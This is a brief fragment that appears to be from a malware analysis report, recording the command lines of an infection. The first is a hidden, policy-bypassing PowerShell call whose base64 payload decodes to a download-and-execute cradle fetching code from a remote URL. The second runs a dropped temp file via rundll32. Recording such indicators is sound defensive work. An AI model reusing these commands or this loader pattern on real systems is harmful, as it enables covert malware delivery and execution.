Technical Information
- '<SYSTEM32>\cmd.exe' /c POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBh...' (with hidden window)
- '<SYSTEM32>\rundll32.exe' %TEMP%\sdKBQ.dat PluginInit